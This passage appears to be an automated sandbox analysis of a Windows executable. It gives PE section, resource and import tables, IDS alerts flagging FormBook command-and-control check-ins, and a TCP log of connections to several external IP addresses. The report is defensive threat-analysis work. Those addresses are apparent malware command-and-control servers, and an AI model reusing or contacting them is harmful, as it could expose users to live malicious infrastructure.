                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0xc80000x5ca580x5cc0072eb5ba23a69100001907ceaa831ac95False0.9286477636455526data7.897038869891541IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x1250000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                                                RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                                                RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                RT_RCDATA0xd07b80x53d1ddata1.000323308818175
                                                                                RT_GROUP_ICON0x1244d80x76dataEnglishGreat Britain0.6610169491525424
                                                                                RT_GROUP_ICON0x1245500x14dataEnglishGreat Britain1.25
                                                                                RT_GROUP_ICON0x1245640x14dataEnglishGreat Britain1.15
                                                                                RT_GROUP_ICON0x1245780x14dataEnglishGreat Britain1.25
                                                                                RT_VERSION0x12458c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                RT_MANIFEST0x1246680x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                DLLImport
                                                                                WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                UxTheme.dllIsThemeActive
                                                                                KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishGreat Britain
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-12-24T08:23:35.385717+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549732154.215.72.11080TCP
                                                                                2024-12-24T08:24:09.428113+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549812116.50.37.24480TCP
                                                                                2024-12-24T08:25:32.858936+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54986785.159.66.9380TCP
                                                                                2024-12-24T08:25:47.642095+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999091.195.240.9480TCP
                                                                                2024-12-24T08:26:11.200375+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54999466.29.149.4680TCP
                                                                                2024-12-24T08:26:26.330372+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549998195.110.124.13380TCP
                                                                                2024-12-24T08:26:57.688067+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550002217.196.55.20280TCP
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 24, 2024 08:23:32.944736958 CET4973280192.168.2.5154.215.72.110
                                                                                Dec 24, 2024 08:23:33.856511116 CET8049732154.215.72.110192.168.2.5
                                                                                Dec 24, 2024 08:23:33.856648922 CET4973280192.168.2.5154.215.72.110
                                                                                Dec 24, 2024 08:23:33.859038115 CET4973280192.168.2.5154.215.72.110
                                                                                Dec 24, 2024 08:23:33.979686975 CET8049732154.215.72.110192.168.2.5
                                                                                Dec 24, 2024 08:23:35.385493040 CET8049732154.215.72.110192.168.2.5
                                                                                Dec 24, 2024 08:23:35.385643959 CET8049732154.215.72.110192.168.2.5
                                                                                Dec 24, 2024 08:23:35.385716915 CET4973280192.168.2.5154.215.72.110
                                                                                Dec 24, 2024 08:23:35.388562918 CET4973280192.168.2.5154.215.72.110
                                                                                Dec 24, 2024 08:23:35.508171082 CET8049732154.215.72.110192.168.2.5
                                                                                Dec 24, 2024 08:23:59.661310911 CET4978880192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:23:59.780991077 CET8049788116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:23:59.781112909 CET4978880192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:23:59.782883883 CET4978880192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:23:59.902424097 CET8049788116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:01.284461021 CET4978880192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:01.294707060 CET8049788116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:01.294770956 CET8049788116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:01.294812918 CET4978880192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:01.294856071 CET4978880192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:01.404284000 CET8049788116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:01.404536009 CET4978880192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:02.302114010 CET4980080192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:02.421710968 CET8049800116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:02.421883106 CET4980080192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:02.423640013 CET4980080192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:02.543158054 CET8049800116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:03.927052975 CET8049800116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:03.927161932 CET8049800116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:03.927292109 CET4980080192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:03.941293955 CET4980080192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:04.959400892 CET4980680192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:05.079049110 CET8049806116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:05.079319954 CET4980680192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:05.081207037 CET4980680192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:05.200817108 CET8049806116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:05.200877905 CET8049806116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:06.596338987 CET4980680192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:06.716358900 CET8049806116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:06.716434956 CET4980680192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:07.615107059 CET4981280192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:07.734699011 CET8049812116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:07.734797955 CET4981280192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:07.736605883 CET4981280192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:07.857009888 CET8049812116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:09.427828074 CET8049812116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:09.428049088 CET8049812116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:09.428112984 CET4981280192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:09.430555105 CET4981280192.168.2.5116.50.37.244
                                                                                Dec 24, 2024 08:24:09.549994946 CET8049812116.50.37.244192.168.2.5
                                                                                Dec 24, 2024 08:24:23.444900036 CET4984880192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:23.564519882 CET804984885.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:23.564760923 CET4984880192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:23.566631079 CET4984880192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:23.686170101 CET804984885.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:25.080759048 CET4984880192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:25.200916052 CET804984885.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:25.200998068 CET4984880192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:26.099641085 CET4985480192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:26.219470978 CET804985485.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:26.219584942 CET4985480192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:26.222455978 CET4985480192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:26.342029095 CET804985485.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:27.736975908 CET4985480192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:27.856803894 CET804985485.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:27.856889963 CET4985480192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:28.755628109 CET4986080192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:28.875075102 CET804986085.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:28.875164986 CET4986080192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:28.877325058 CET4986080192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:28.996831894 CET804986085.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:28.996989012 CET804986085.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:30.393192053 CET4986080192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:30.513108015 CET804986085.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:30.513173103 CET4986080192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:31.412029028 CET4986780192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:31.531500101 CET804986785.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:24:31.531593084 CET4986780192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:31.533456087 CET4986780192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:24:31.652976990 CET804986785.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:25:32.858721018 CET804986785.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:25:32.858823061 CET804986785.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:25:32.858936071 CET4986780192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:25:32.861774921 CET4986780192.168.2.585.159.66.93
                                                                                Dec 24, 2024 08:25:33.015057087 CET804986785.159.66.93192.168.2.5
                                                                                Dec 24, 2024 08:25:38.233604908 CET4998780192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:38.353245020 CET804998791.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:38.355437040 CET4998780192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:38.355437040 CET4998780192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:38.475034952 CET804998791.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:39.636188030 CET804998791.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:39.637763977 CET804998791.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:39.638041973 CET4998780192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:39.865513086 CET4998780192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:40.881632090 CET4998880192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:41.001326084 CET804998891.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:41.001466990 CET4998880192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:41.005633116 CET4998880192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:41.125284910 CET804998891.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:42.313630104 CET804998891.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:42.313649893 CET804998891.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:42.313746929 CET4998880192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:42.543349028 CET4998880192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:43.553455114 CET4998980192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:43.672972918 CET804998991.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:43.673079967 CET4998980192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:43.675380945 CET4998980192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:43.794864893 CET804998991.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:43.795634031 CET804998991.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:44.950000048 CET804998991.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:44.950145960 CET804998991.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:44.950242996 CET4998980192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:45.201900959 CET4998980192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:46.217619896 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:46.337210894 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:46.337327003 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:46.341620922 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:46.461071014 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.641958952 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.641988993 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642004967 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642095089 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.642147064 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642163992 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642180920 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642187119 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.642199993 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642216921 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642227888 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.642251015 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.642435074 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642451048 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.642487049 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.761827946 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.762029886 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.762111902 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.834112883 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.834542990 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.834636927 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.838313103 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.838447094 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.838521957 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.846811056 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.846880913 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.846950054 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.958911896 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.958933115 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.959038973 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.966255903 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:25:47.966341972 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:47.969217062 CET4999080192.168.2.591.195.240.94
                                                                                Dec 24, 2024 08:25:48.198087931 CET804999091.195.240.94192.168.2.5
                                                                                Dec 24, 2024 08:26:01.890834093 CET4999180192.168.2.566.29.149.46
                                                                                Dec 24, 2024 08:26:02.010350943 CET804999166.29.149.46192.168.2.5
                                                                                Dec 24, 2024 08:26:02.010452986 CET4999180192.168.2.566.29.149.46
